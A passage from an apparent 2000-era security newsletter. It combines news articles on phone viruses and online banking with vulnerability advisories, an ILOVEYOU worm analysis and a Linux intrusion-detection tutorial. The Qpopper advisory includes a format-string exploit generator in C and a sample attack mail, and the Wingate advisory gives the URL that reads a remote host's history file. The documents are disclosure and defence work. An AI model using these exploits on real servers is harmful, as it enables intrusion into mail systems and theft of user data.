Computer viruses attack devices that are programmable, and
spread when there is some link between one device and
another. Early viruses spread mainly via infected discs handed
from user to user. Today the main avenue of infection is by
e-mail.
"The thing that makes viruses a threat is that we're so well
connected," says Charles Palmer, a specialist in network
security and cryptography research at IBM. This suggests
there is a huge potential for viruses to spread via future
programmable mobiles.
In current and next-generation phones, and in PDAs, designers
have several ways to prevent virus damage. First, they can
limit the devices' programmability, leaving them without the
capacity to run viruses. Current phones already fall into this
category--but future generations will be much more capable.
Another option is to store important programs in read-only
memory so that a virus cannot overwrite them. "The drawback
then is that the phone cannot be upgraded," says Edward
Felton, a computer scientist at the Secure Internet
Programming Laboratory at Princeton University in New Jersey.
And this strategy cannot protect data that the user adds, as
it must be stored in a writable memory. "A virus that changes
your mom's number to a premium-rate number in Nigeria could
rack up huge bills," says Palmer.
Finally, it is possible to ensure that a phone's built-in programs
are separate, so that one program cannot start another. If the
virus cannot dial out, it cannot spread.
But researchers say there is huge pressure on cellphone
designers to add functions, and that this will increase the
chances of infection. "If somebody sends you a telephone
number by e-mail, you want to be able to click on that number
to dial it," says Avi Ruben, a specialist in Internet security at
the AT&T Laboratories in Florham Park, New Jersey. "I know
that there are prototypes in development that allow this kind
of threat," adds Felton.
When e-mail attachments can trigger other applications, they
could dial out, start recording software for personal
surveillance, or wipe out the contents of files such as
electronic wallets.
However, Charles Davies, chief technology officer for the
British PDA maker Psion, argues that this scenario is unlikely,
at least for devices that run the widely used EPOC operating
system, which he helped to design. "I don't want to seem
smug or complacent but I just don't see it as a big threat," he
says.
Palmer sees the way forward in mathematical proofs that show
whether a system is secure, and calls for more research into
the area. "It's the only choice we have in the long run," he
says.
Justin Mullins
@HWA
227.0 [MM] The virtual threat
~~~~~~~~~~~~~~~~~~~~~~~
http://www.economist.com/editorial/freeforall/current/index_survey.html
THE most remarkable thing about the effect of the Internet
on the financial-services sector is not how pervasive it has
been; it is how limited a transformation it has so far
wrought. Financial institutions, after all, deal in a
product�money�that for many of their customers has
long been �virtual�. Bank-account holders are used to the
notion that their cash is represented by a series of numbers
on a monthly statement generated by a computer, or by the
glowing green figures of a cash machine. And they have
become accustomed to making payments using pieces of
plastic backed with a clever magnetic strip. The Internet
might have been designed for the distribution, monitoring
and management of this ubiquitous electronic commodity.
More worryingly for the firms that make their living out of
arranging financial transactions, the Internet might also have
been designed to do away with them. Banks and other
financial firms are intermediaries, standing between lenders
and borrowers, savers and spenders. For decades, banks
in rich countries have been fretting about how to cope with
�disintermediation�: lenders dealing direct with borrowers
(as many do already in the capital markets), without using a
bank�s balance sheet to add a layer of cost. The Internet
is, potentially, the greatest force for disintermediation the
banks have ever had to tackle. Other intermediaries, such
as retailers, face the same problem. But money, unlike,
say, an item of clothing, is a commodity that can actually be
used, transferred and delivered electronically.
Samuel Theodore, of Moody�s, a credit-rating agency,
believes the banks are currently undergoing their �fourth
disintermediation�. The first involved savings, and the
growth of mutual funds, specialised pension funds and
life-insurance policies at the expense of bank deposits; the
second saw the capital markets take on some of the
banks� traditional role as providers of credit; in the third,
advances in technology helped to streamline back-office
operations. Now, in the fourth stage, the distribution of
banking products is being disintermediated. This process
has been going on for some years, with the spread of
automated teller machines (ATMs) and, over the past
decade or so, telephone banking and PC-based proprietary
systems; but the Internet hugely enlarges its scope.
Spotty youth
Yet, except for one activity, share-trading, and one part of
the world, Scandinavia, Internet-based financial retailing is,
if not in its infancy, then scarcely at puberty. And wholesale
banking, although it relies heavily on complex electronic
trading systems and information technology, is still
conducted mostly on closed proprietary networks. To be
sure, there are some signs that the disintermediation the
industry fears may be starting. Internet banks, with their
low costs�and their dot.com habit of paying more
attention to the acquisition of customers than the turning of
profits�have drawn deposits away from offline banks in
some countries. And in the capital markets, bond issues
and share offerings have been syndicated and distributed
over the Internet. Some highly rated borrowers have for
years been borrowing through their own issues of
commercial paper. The Internet can only enhance the
appeal of do-it-yourself fund-raising.
But these are just the early signs of an upheaval that is
gathering momentum by the day. There are a number of
reasons why many online financial services have been slow
to catch on, and why they can now be expected to
develop faster. Concerns about the security of Internet
transactions, a particularly important issue for financial
dealings, are gradually being eased. Internet use, even in
the rich world, has been patchy, but is spreading fast. And
whereas conducting financial transactions online up to now
has often been clunky and annoying, the technology is
improving all the time. Those technological advances are
also liberating the Internet from the confines of the PC (see
article).
Most important, financial institutions themselves, which in
the past have often resisted change, may now become its
most ardent promoters. Having invested heavily in their
own systems, banks were understandably reluctant to
jettison them for web-based replacements. And adapting
their own processes for the Internet has often proved
cumbersome and difficult. Moreover, until recently banks
faced little pressure from their customers to change what
were seen as useful but boring services, much the same as
electricity and gas. But soon, in many countries, customers
will expect an online service as a matter of course.
The banks� staff, too, have been reluctant to abandon the
old ways of doing things. Besides, those old ways have
often been extremely profitable, so change threatens not
just working habits, but the bottom line too. Now,
however, almost every financial firm, from the swankiest
Wall Street investment bank to the provider of microcredit
to the very poor, has found that it has no choice but to
invest in an �Internet strategy�. And having invested in it, it
will need to persuade its customers to use it. So in areas
where the advantages of doing business online may not be
obvious to the consumer�notably in retail banking�the
banks may find themselves trying to coax, bribe and bully
reluctant customers online.
The banks� conservatism, on which they used to pride
themselves, has become an embarrassment. It has also
been spotted by the new breed of Internet entrepreneur
taking aim at the banks� business. The models are firms
such as E*Trade and Charles Schwab, discount
stockbrokers that found in the Internet a means of
challenging even the biggest and most prestigious traditional
firms. Now commercial and investment banks, fund
managers and financial advisers are all vying with each
other to present themselves as Internet-savvy, and boasting
about their investment in online services.
All this has created a strange, contradictory world. Clever
young things with a bright idea and a few million dollars of
venture capital behind them talk cheerily of the demise of
traditional banks. Bill Gates, no less, said six years ago that
banking is necessary, but banks are not. Now, the story
goes, they are irredeemably hampered by their �legacy
systems��their existing management structures, staffing
levels and computers�and by their �channel
conflicts��between what they do now, and online
methods of sales and distribution. Their bosses simply do
not �get it�. Or, even if they do, their institutions are so
deeply rooted in the old economy and pre-Internet styles
of business that there is no point in turning them around.
The dinosaurs in the supposedly stuffy offices of these big
banks and securities firms appear unaware that a meteorite
may be on its way to obliterate them. On the contrary,
resolutely upbeat online-service managers, often rather
self-conscious in their tieless, suitless new-economy
uniforms, claim they are having the times of their lives.
Never has technology revealed so many new avenues for
developing the business. It is, says Denis O�Leary, who
runs Chase Manhattan�s Chase.com, �a golden age�.
Not least because, in the industrialised West, many firms
have been making bigger profits than ever. Years of
economic expansion and bull markets have yielded good
income from traditional lending, from trading and from
investment. The only obvious cloud in the sky is that
banks� share prices seem not to reflect this (see chart 1).
Indeed, in some countries, such as Britain, they imply that
the market expects banks� profits to collapse in the next
few years. Even the stockmarket seems to believe the
dot.com wannabes, and rewards them with much richer
valuations than boring old-economy banks.
Still kicking
And yet this survey will argue that many of the older
institutions have a good story to tell. The �legacy systems�
at which the upstarts scoff have one big virtue: they have
tended, by and large, to work. Big banks process trillions
of dollars a day. It is almost inconceivable that they might
close down for a few hours because some clever Internet
saboteur has found a way of snarling up their technology
(as has recently happened to some of the biggest
websites). Existing banks have customers in numbers that
newcomers can only dream of, and even unpopular
incumbents benefit from their customers� inertia.
The Internet also brings established firms huge
opportunities as well as threats. To take two important
examples, it offers ways of cutting costs and of marketing
products much more efficiently. For years, in America,
Europe, Japan and elsewhere, the industry has been
consolidating: bank after bank has been taken over by or
teamed up with an institution in a complementary line of
business. Usually, these deals are justified to shareholders
by the extra returns that can be generated once
overlapping costs are stripped out. The Internet,
potentially, offers a way of taking a knife to whole layers of
costs. Once a customer is convinced to carry out most of
his transactions online, his account becomes much cheaper
to administer.
The other much-cited benefit of consolidation is
�cross-selling��of insurance policies to bank-account
holders, for example. Yet so far this has rarely been all that
successful in practice. The Internet can be a
precision-guided marketing tool. For example, if you apply
online for a credit card from NextCard, an American
Internet operation, you will be offered a choice of three
charging structures. To qualify for the most favourable, you
have to transfer a certain outstanding balance from your
other credit cards. That sum will�fancy that!�be the
actual total of your other balances, which NextCard has
just ascertained online from the credit bureaus. Or, in
wholesale finance, suppose you are a potential investor in a
company�s initial public offering of shares, and have just
finished watching the boss boosting his company�s
prospects on Merrill Lynch�s online investment-banking
service. The phone rings. And yes, it is a Merrill Lynch
salesman who knows you have been watching, and thinks
that now may be the moment to clinch a sale.
But, for banks, each of these pluses comes with a minus.
Because costs are so much lower for Internet-based
transactions, the barriers to entry are lower as well, which
implies that margins will come under pressure. And
although the Internet makes well-directed sales pitches
easier, that is hardly compensation for the precariousness
of online customer relationships. Once your client is on the
Internet, he is only a mouse-click away from your
competitor, and more and more financial sites, search
engines and portals will be pushing competing products at
him. That, too, will squeeze margins.
Viewed from this perspective, for many financial institutions
the Internet is a double bind. Embrace it, and you may still
find yourself losing business, or at least seeing profit
margins dwindle. But ignoring it could be terminal. This
survey will argue that the pressures for change have
become irresistible. It concentrates on places where the
process is most advanced�America and Europe�but the
same lessons apply everywhere. Big financial institutions
are global firms. And on the Internet, change spreads like
wildfire. The stockmarket with the highest proportion of
Internet trading is not, as you might think, in New York,
but in Seoul.
To make the challenge for the industry even more daunting,
the revolution also encompasses the very architecture of
many of the world�s biggest financial markets. Stock,
commodity and futures exchanges, clearing and settlement
systems are also being forced to consolidate and
modernise, to prepare for the day when financial
transactions are settled instantaneously.
In public, no bank boss these days would admit to anything
less than whole-hearted enthusiasm for the online
adventure. In private, however, some still see it as just
another distribution channel, perhaps less important than
others, such as the telephone. A few still cling to the dream
that it is a fad they have to indulge because their
shareholders seem to like it. Even such non-believers,
however, are being forced by the market to formulate an
online strategy. If they are too slow, or get it wrong, the
consequences for their firms could be deadly. And if they
still need convincing, they need only look at what has
happened, in just four years, to stockbroking.
http://www.qualisteam.com/eng/conf.shtml
@HWA
228.0 [b0f] Qpopper exploit code
~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.digibel.org/~b0f/advisors/b0f5-Qpopper.txt
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 5
Advisory Name: Remote shell via Qpopper2.53
Date: 5/23/00
Application: Qpopper 2.53 for *NIX
Vendor: Qualcomm Incorporated
WWW: www.qualcomm.com
Severity: can give users remote
shell with gid=mail.
Author: prizm (prizm@resentment.org)
Homepage: b0f.freebsd.lublin.pl
* Overview
Qpopper is the most widely-used server for the POP3 protocol. This allows users to
access their mail using any POP3 client. Qpopper supports the latest standards,
and includes a large number of optional features. Qpopper is normally used with
standard UNIX mail transfer and delivery agents such as sendmail or smail.
* The Problem
Yes, Qpop, again and again...
There is a bug in version 2.53 of Qpop that can give you a remote
shell with gid=mail. Problem is with euidl command which uses user input as
format string for pop_msg() function.
Lets examine following code from Qpop 2.53 source:
--> pop_uidl.c, around line 150:
................
sprintf(buffer, "%d %s", msg_id, mp->uidl_str);
if (nl = index(buffer, NEWLINE)) *nl = 0;
sprintf(buffer, "%s %d %.128s", buffer, mp->length, from_hdr(p, mp));
! return (pop_msg (p,POP_SUCCESS, buffer));
^^^^^^^^^^^^^
.................
Function pop_msg() is declared in pop_msg.c as pop_msg(POP *p, int stat,
const char *format,...), and here we have user-input as format string. Lame.
Ok, back to problem, imagine following smtp session:
MAIL FROM:<hakker@evil.org>
200 Ok
RCPT TO:<luser@host.withqpop253.com>
200 Ok
data
200 Okey, okey. end with "."
Subject: still trust qpop?=/
X-UIDL: AAAAAAAAAAAAAAAA
From: %p%p%p%p%p%p%p
test
.
200 BLABLABLA Ok, message accepted for delivery.
Then, luser connects with his pop account and runs euidl command there:
+OK QPOP (version 2.53) at b0f starting. <666.666@b0f>
USER luser
+OK Password required for luser.
PASS secret
+OK luser has 3 messages (1644 octets).
euidl 3
+OK 2 AAAAAAAAAAAAAAAA 530 0xbfbfc9b00x804fd740xbfbfc9b00x2120x8052e5e0xbfbfd1e80x8057028
Yeah, thats from my box with FreeBSD. As you can see, our %p%p%p%p%p%p%p
where implemented as arguments for vsnprintf() command.
* Exploiting
Is this possible? Yeah, sure!
But there are some limits. Qpopper2.53 from FreeBSD ports with patches is
much more difficult to exploit than one from linux. It is because freebsd
patches change vsprintf() call in pop_msg.c to vsnprintf() call, and there is
big difference between them. Qpopper with FreeBSD's patches IS exploitable.
Exploit
-------
/* qpop_euidl.c exploit by prizm/Buffer0verflow Security
*
* Sample exploit for buffer overflow in Qpopper 2.53.
* This little proggie generates a mail u need to send.
*
* Standard disclaimer applies.
* By the way, exploit is broken =) You need to insert shellcode.
*
* MAD greets to tf8 for pointing out the bug, and all other b0f members.
* greets to USSRLabs and ADM
* check http://b0f.freebsd.lublin.pl/ for news.
*/
#include <stdio.h>
#include <string.h>
char shellcode[]="imnothing";
int main(int argc, char *argv[])
{
int i;
unsigned long ra=0;
if(argc!=2) {
fprintf(stderr,"Usage: %s return_addr\n", argv[0]);
exit(0);
}
sscanf(argv[1], "%x", &ra);
if(!ra)
return;
if(sizeof(shellcode) < 12 || sizeof(shellcode) > 76) {
fprintf(stderr,"Bad shellcode\n");
exit(0);
}
fprintf(stderr,"return address: 0x%.8x\n", ra);
printf("X-UIDL: ");
for(i=0; i < sizeof(shellcode);i++)
printf("%c", shellcode[i]);
printf("\r\n");
printf("From: %s", "%.1000d");
for(i=0; i < 50; i++)
printf("%c%c%c%c", (ra & 0xff), (ra & 0xff00)>>8, (ra & 0xff0000)>>16, (ra & 0xff000000)>>24);
printf("@test\r\n");
printf("Subject: test\r\n\r\nhuh?\r\n.\r\n");
return 0;
}
Exploiting QPOP from FreeBSD ports
----------------------------------
It is NOT easy, because vsprintf() is replaced with vsnprintf() so we can't
overflow stack, but we still have control over it (remeber %n?).
Im not going to post exploit for this because it is really generic, but I
will explain theory on exploiting qpop with vsNprintf.
There is an little trick with %n YOu should know. Try to understand why
folowing code succeeds and prints out 2000, not sizeof(b):
---<cut>---
#include <stdio.h>
int main(void){
int s=1; char b[1024]; int q;
snprintf(b, sizeof(b), "%.2000d%n", 1, &q);
return printf("%d, overflowed? %s\n", q, (s==1?"NO":"YES"));
}
---</cut>---
On my box with FreeBSD 3.4 i have:
2000, overflowed? NO
Hah, first time i expected to see 1024, but YOu know that all is
unpredictable . So, this little thing will help us a lot.
Exploiting it:
a) Find where in stack is located user input.
b) Compose a message with filed X-UIDL and From:
X-UIDL: ppRETARETARETARETA
From: <SHELLCODE>%.RETURNd%n@test
where:
"pp" is for padding (two or three chars)
"RETA" is return address pointing to SHELLCODE
"SHELLCODE" guess
"RETURN" return address
c) Exploit? If you need an exploit that will work on FreeBSD, code it yourself.
* Vulnerable Versions
2.53(Others?)
* Fix
You can download Qpopper 3.1 at http://www.eudora.com/freeware/qpop.html#CURRENT which
is not vulnerable to this problem.
Or you can manually patch it by doing the following:
At lines 150 and 62 from pop_msg.c, replace:
- return (pop_msg (p,POP_SUCCESS, buffer));
to:
+ return (pop_msg (p,POP_SUCCESS, "%s", buffer));
copyright � 1999-2000
prizm, buffer0verfl0w security
b0f.freebsd.lublin.pl
@HWA
229.0 [b0f] Wingate advisory
~~~~~~~~~~~~~~~~~~~~~~
http://www.digibel.org/~b0f/advisors/b0f4-Wingate.txt
_____________________________________________________________________
b u f f e r 0 v e r f l 0 w s e c u r i t y a d v i s o r y # 4
Advisory Name: Wingate History database file reading
Date: 02/05/00
Application: Wingate 3.0.5
Vendor: Deerfield.com
WWW: www.deerfield.com
Severity: remote retrivial of history database file
of the remote wingate server.
Author: axess ( axess@mail.com )
Homepage: www.b0f.com
* Overview
Wingate is a software for internet sharing and are very common.
* The Problem
First i want to add, WinGate versions prior to 2.1 allowed Internet access by default.
But after that version they changed it.
In WinGate 3.0 Home there are no way to change it so people can access it from the internet.
In Wingate 3.0 Standard and Pro you can change this bindings.
By researching this i have found out that many "in the wild" allow connections from the internet
and this problem affect many.
If not accessable from the internet they are always accessed from the LAN that has it.
So when connecting to the logfile server on port 8010 i found out that all
the files in the "root" directory of the installed software can be read remotely.
Nothing particular interesting besides the wingates administrator history file.
It contains computer names, usernames and the activity of the users that logged in.
How this information can be used you can figure out yourself.
Besides that its a matter of privacy for the users using it that should be taken in mind.
So we just fire our browser away to
http://server.com:8010/
Now we can just add the file we want to download in this case
http://server.com:8010/history.dbf
* Vulnerable Versions
I have tested the newiest version 3.0.5 on NT4.0.
But im pretty sure all versions prior to it are vulnerable to the same problem.
* Fix
Close that stupid port that have always been a problem.
copyright � 1999-2000
buffer0verfl0w security
www.b0f.com
@HWA
230.0 [b0f] ILOVEYOU Virus analysis and removal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.digibel.org/~b0f/lamagra/analysis.txt
Analysis of the LOVE-LETTER-FOR-YOU virus/worm
------------------------------------------------------------------------------------------------
The virus/worm hit Belgium and the rest of the world on Thursday 15/04/2000. A lot of important
companies were struck including banks, factories and my dads work :).That's where I got the
little bugger. The virus/worm is a big vbscript that spreads by email (smells like Melissa :))
and infects every script on your computer.
Lifecycle
------------------------------------------------------------------------------------------------
All starts by opening an attachment on an email, then the script starts.
It copies itself into:
$windir/Win32DLL.vbs ($windir = c:\windows on most windows systems)
$systemdir/MSKernel32.vbs ($systemdir = c:\windows\system)
$windir/LOVE-LETTER-FOR-YOU.TXT.vbs
Next it adds those files in the registry so they auto-start on boot.
After that it changes the default page of internet explorer, that way it downloads an executable
from a site when IE opens. If the file has already been downloaded it also adds that into the
registry and changes the default page to "about:blank".
Then it starts sending emails with the script attached to all the people in your addresslist
Finally the big mess starts, the virus scans every harddisk and networkdisk for extentions:
Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg
All files found are overwritten by the virus and when mp2's or mp3's are found it copies itself
to a vbs script in the same directory. And when mIRC is found a small mIRC script is created
which sends an html page, which tries to infect you using IE, to every user that joins a channel
you're in.
executable
------------------------------------------------------------------------------------------------
It cracks the share passwords and sends those + ipaddr by email to the creator of this virus
(I couldn't get this program because the server was shutdown, thanks to G0Dfarter for checking it)
Disinfection
------------------------------------------------------------------------------------------------
Open regedit and start deleting the malicious entries
HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\MSKernel32
HKEY_HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\RunServer\Win32DLL
HKEY_HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run\WIN_BUGSFIX
Search for WIN-BUGSFIX.exe and remove it.
Remove $dirsystem\LOVE-LETTER-FOR-YOU.HTM
Check files with extensions: Vbs, vbe, js, jse, css, wsh, sct, hta, vbs, jpg, jpeg and check for
infection, if so delete them (and replace them with the original).
If you have mIRC is installed remove the script.ini file.
Remove all the emails, maybe warn the people in your addresslist so they don't open the attachment.
Prevention
------------------------------------------------------------------------------------------------
There is only 1 rule in these cases: do NOT open suspicious files
The number one cause why this virus is so affective is that in windows everything is linked.
You can control your entire computer from a simple wordmacro (and worst).
The best thing to do is turn off all sorts of scripting in windows (if possible).
Lamagra access-granted@geocities.com http://lamagra.seKure.de
Member of b0f/buffer0verfl0w security http://www.b0f.com
@HWA
231.0 [IND] Intrusion detection on Linux
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.securityfocus.com/focus/ids/articles/linux-ids.html
Intrusion Detection on Linux
by David "Del" Elson
last updated Monday, May 22, 2000
RedHat
Introduction
This article focuses on several host-based intrusion detection systems that are available on Linux. In particular, I will cover some of the basics of installing setting up these packages, how they are useful, and in what circumstances
they can be used.
Systems Security 101
This article assumes a basic knowledge of systems security. In particular, I will assume that the most basic security measures have already been taken to secure a host against intrusion from the internet. These measures could
include:
Firewalling, to ensure that access to the various TCP and UDP ports of the system that were not intended for internet access are prevented. For example, a basic set of firewalling rules for a web server would ensure that
the only TCP/IP access to the machine was on TCP port 80, the port normally used for HTTP access.
Disabling daemons that are not required. For example: A web server normally needs a process running to serve web pages. Processes that are not associated with serving web pages, such as RPC/Portmap services, NFS
services, X Font Server, DNS name server, and other extraneous and unused applications should be stopped or disabled. On a Red Hat Linux system, this is normally done by using one of the run level editors, for example
ntsysv or tksysv, to disable the startup of any daemon or service that is not required.
Disabling access to ports that are not required, by editing /etc/inetd.conf. Typically, a system will come pre-installed with access to many ports enabled in the /etc/inetd.conf file. Editing this file to remove or comment out any
lines that are not required is the most basic system security activity and should be carried out on all systems.
Lines of Defence
Illustration 1: Multi Layered Systems Security
In this article, I will discuss a multi-layered approach to systems security. Several security layers can be used independently to provide additional protection in case any of the layers should be breached. An example of a
multi-layered security system is shown in illustration 1.
Each layer in the diagram provides additional data protection to the layers above it. For example, the first layer is the firewall. Should an intrusion attempt not be defeated by the firewall, a second layer, the Port Sentry program,
can provide additional protection.
Further inside the security system are the LIDS and LogCheck programs, that provide additional protection should an intrusion attempt not be intercepted by the Port Sentry program.
Monitoring Incoming Connections
The first layer of protection behind the firewall is a software package that will monitor incoming attempts to connect to the machine. The PortSentry package (http://www.psionic.com/abacus/portsentry/) provides a simple and
effective method of doing this.
What does PortSentry do?
PortSentry is a program that monitors activity on specific TCP/IP ports. Activity on the ports that are monitored by PortSentry is reported, and one of several options can be taken, including denying further attempts to access to
your system from the source of the activity. This is an important defence mechanism, because a hacker will typically probe your system for weaknesses ("port scanning") before attempting an intrusion. Detecting the probe or port
scan, and completely denying further access to your system by a potential hacker, robs that hacker of the ability to follow up on any port scans with a real intrusion attempt.
Installing PortSentry
For users of Red Hat Linux, PortSentry is available in RPM format on the Red Hat contrib FTP site. This site is mirrored in various locations around the world, check at www.redhat.com for the location of your nearest mirror. I
haven't yet determined the availability of a .deb format package for PortSentry but I am sure there is one out there.
For other Linux systems, installing PortSentry from the source code is relatively simple.
Recommended Configuration
PortSentry runs in a number of modes, including various TCP and UDP stealth modes. The mechanism that I prefer to use for running PortSentry is to bind it to a TCP port that (a) is not in use, and (b) is known in some systems to
have potential for intrusion attempts. For example, port 143 (imap2), port 111 (portmap) and port 23 (telnet) are TCP ports that I do not use on my internet systems, and my web server was scanned on both of those ports in the
last 24 hours.
To start PortSentry in basic TCP mode, ensure that your system start-up scripts run this command somewhere:
portsentry -tcp
Also, ensure that the PortSentry config file (portsentry.conf) contains a TCP_PORTS line enabling scanning on the ports that you require.
Response Options
The "Response Options" section of the portsentry.conf file allows you to specify what response that PortSentry will take on detecting unwanted activity. The mechanism that I normally choose is to use ipchains to block further
access from the source of the activity. This is done by uncommenting the following line in the portsentry.conf file:
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
On systems that receive a high level of port scanning activity, removing the "-l" at the end of the above line will prevent logging of further incoming connections, which might be useful to save space in the log files.
Monitoring System Logs
Firewalling systems, and software like PortSentry perform one useful function, in that they monitor and prevent connections coming in to unwanted ports on the system. This can prevent access to a system via a standard
scan-and-intrude method.
Where a system is required to run a particular service (eg: Apache on a web server, or BIND on a DNS server), and a hacker has uncovered a particular loophole in the service, these programs will unfortunately not achieve the
result of keeping all intruders out of the system. A system acting as a DNS server that has a vulnerable copy of BIND running on it will eventually be discovered by a hacker that scans a wide range of machines for a single port
(the DNS port) on each machine, and attempts intrusion against that port only. The firewall and PortSentry will unfortunately see this intrusion attempt as a legitimate access to the system.
LogCheck
LogCheck (http://www.psionic.com/abacus/logcheck/) is a useful program for scanning system logs for unusual activity. LogCheck works by scanning the various system log files (under Linux these are located in /var/log), and
notifying the system administrator by e-mail if there is any unusual activity. Unusual messages in the log files can often be generated by intrusion attempts, or actual intrusions against your system.
Installing LogCheck
LogCheck is available in RPM format from the Red Hat contrib archives, and from the same sources as PortSentry. Installing LogCheck from the RPM file or from the source code (read the INSTALL file provided with the source
code) is relatively simple.
Configuring LogCheck
LogCheck has four main configuration files. In the RPM version, these are stored in the /etc/logcheck directory. Normally, only the logcheck.ignore and the logcheck.violations.ignore files need modification. The normal process
that I go through after installing LogCheck is as follows:
Allow LogCheck to run once with the standard configuration files. This willl produce a large output file, which can be thrown away.
24 hours later, allow LogCheck to run again. This will detect any new entries in the log files since the last run, and will produce a smaller but still sizeable output file. Read this file carefully.
For entries in the file that are of no great concern (use your judgement for this) find a specific identifying string in the entry. For entries that are in the "Security Violations" section, add the identifying string to the
logcheck.violations.ignore file. For other entries (in the "Unusual System Events" section), add the string to the logcheck.ignore file.
Repeat this process, once every 12 - 24 hours for approximately a week. By this stage, enough "bogus" entries will be filtered out by the strings that you have added to the .ignore files that the daily LogCheck report will
contain only genuine system concerns.
Note that the RPM file specifies that LogCheck is to be run hourly, but normally I only run it daily except on critical systems that need regular monitoring. This is done by moving the /etc/cron.hourly/logcheck file into /etc/cron.daily.
Kernel Based Intrusion Detection
Kernel based intrusion detection is a relatively new art form for Linux. The main kernel based intrusion detection system currently available is called LIDS, and is available from http://www.lids.org/.
What is LIDS?
LIDS is an intrusion detection and prevention system that resides within the Linux kernel.
LIDS' protection is aimed at preventing the root user (who would normally have access to the entire system) from tampering with important parts of the system. LIDS' most important features include increased file system
protection, protection against direct port access or direct memory access, protection against raw disk access, and protection of log files. LIDS also prevents certain system actions, such as installing a packet sniffer or changing
firewall rules.
LIDS Documentation
The LIDS system is somewhat more complex to install than either PortSentry or LogCheck. Fortunately, the LIDS web site contains quite good documentation on the LIDS project, including installation and configuration
instructions.
Installing LIDS
First, before installing LIDS, make sure that you have the most up to date LIDS patch (I am using 0.9), and the correct kernel version. I am using the updated kernel (2.2.14-12) from the Red Hat Updates FTP site, because this
contains some security fixes. You also need the source code for the kernel that you are using.
LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I installed LIDS, I obtained the updated kernel (from ftp.redhat.com/updates/ or one of its
mirrors) and installed it according to the instructions at http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html.
The next thing I obtained was the updated kernel source, which also came from ftp.redhat.com/updates/ This I installed using:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
Next, compile and install the lidsadm program:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make
make install
Generate a RipeMD-160 password that will later be installed into the kernel:
lidsadm -P
I entered the password "anypass" and got back the key "d502d92bfead11d1ef17887c9db07a78108859e8".
Next, I copied the standard Red Hat configuration file for my architecture into the /usr/src/linux directory:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
Next, I installed the LIDS patch using the following commands:
cd /usr/src
patch -p0 </usr/local/src/security/lids-0.9/lids-0.9-2.2.14-redhat.patch
Note that the Red Hat supplied kernel is slightly different from the standard 2.2.14 kernel distributed by Linus, as it contains some updated drivers. The lids-0.9-2.2.14-redhat.patch file that is available is slightly different to the standard
lids-0.9-2.2.14.patch file distributed with LIDS, as the latter will not apply cleanly to Red Hat's kernel.
Finally, I configured, compiled, and installed the kernel:
cd /usr/src/linux
make menuconfig
make dep; make clean
make
install; make modules; make modules_install
The following script shows the LIDS configuration options that I chose during the kernel configuration:
[*] Linux Intrusion Detection System support (EXPERIMENTAL)
--- LIDS features
[ ] Hang up console when raising a securit alert
[*] Security alert when execing unprotected programs before sealing
[ ] Do not execute unprotected programs before sealing LIDS
[*] Enable init children lock feature
[*] Try not to flood logs
(60) Authorised time between two identic logs (seconds)
[*] Allow switching LIDS protections
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
(3) Number of attempts to submit password
(3) Time to wait after a fail (seconds)
[*] Allow remote users to switch LIDS protections
[ ] Allow any program to switch LIDS protections
[*] Allow reloading config. file
[ ] Hide some known processes
[*] Port Scanner Detector in kernel
[ ] Send security alerts through network
--- Special authorizations
[ ] Allow some known processes to access /dev/mem (xfree, etc.)
[ ] Allow some known processes to access raw disk devices
[ ] Allow some known processes to access io ports
[ ] Allow some known processes to change routes
--- Special UPS
[*] Allow some known processes to unmount devices
Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"
[*] Unmounting capability is inherited
[*] Allow some known processes to kill init children
Allowed processes: "/etc/rc.d/init.d/halt"
[*] Killing capability is inherited
Note that since I don't have a UPS, am running a headless server (no X installed), and need to access this system remotely, I chose the configuration options above. The options that you choose for your environment may vary.
Configuring LIDS
One important note: After compiling the kernel you must configure LIDS before you next reboot!
LIDS stores its configuration in the /etc/lids.conf file. This file should never be edited by hand, instead, you should configure LIDS by using the lidsadm program.
Running "lidsadm -h" gives a page or so of help as to how to use the lidsadm program. The LIDS documentation (on the LIDS web site) gives some examples of using LIDS to protect files, for example:
lidsadm -A -r /sbin
... which protects (marks read-only) the entire /sbin directory.
My preferred LIDS configuration script looks like this:
lidsadm -Z
lidsadm -A -r /usr/bin
lidsadm -A -r /bin
lidsadm -A -r /usr/sbin
lidsadm -A -r /sbin
lidsadm -A -r /usr/X11R6/bin
lidsadm -A -r /etc/rc.d
lidsadm -A -r /etc/sysconfig
Once the LIDS system has been configured, you need to update your boot scripts to ensure that the "lidsadm -I" command is run during the boot process. This effectively "starts" the LIDS functions in the kernel. I normally place
lidsadm at the end of the /etc/rc.d/rc.local script, as this ensures that the LIDS functionality doesn't prevent the rest of the system scripts from operating correctly.
This is the command line that I use at the end of /etc/rc.d/rc.local to start LIDS:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \
-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \
+INIT_CHILDREN_LOCK
Configuring LILO
Note that since the Kernel was updated using Red Hat's RPMs, you will need to follow the instructions in the Red Hat kernel upgrading web page mentioned above to modify the /etc/lilo.conf file. This will ensure that the new kernel
that has been compiled with LIDS functionality will be the one booted when your system reboots.
After Reboot
After the next reboot, LIDS will be running on your system. If you need to stop LIDS to perform system administration tasks, then you should use one of the following commands:
/sbin/lidsadm -S -- -LIDS
or
/sbin/lidsadm -S -- -LIDS_GLOBAL
You will need to provide the LIDS password, which was inserted into the kernel in RipeMD-160 format during the kernel compile.
